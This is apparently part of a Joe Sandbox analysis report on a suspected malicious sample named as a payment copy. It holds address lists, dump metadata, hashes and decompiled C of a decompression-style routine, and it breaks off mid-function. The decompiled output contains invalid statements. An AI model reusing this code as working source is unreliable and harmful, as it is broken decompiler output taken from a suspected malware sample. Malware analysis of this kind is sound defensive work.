0x00000000
0x004068f7
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x00406a9b
0x00406a64

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
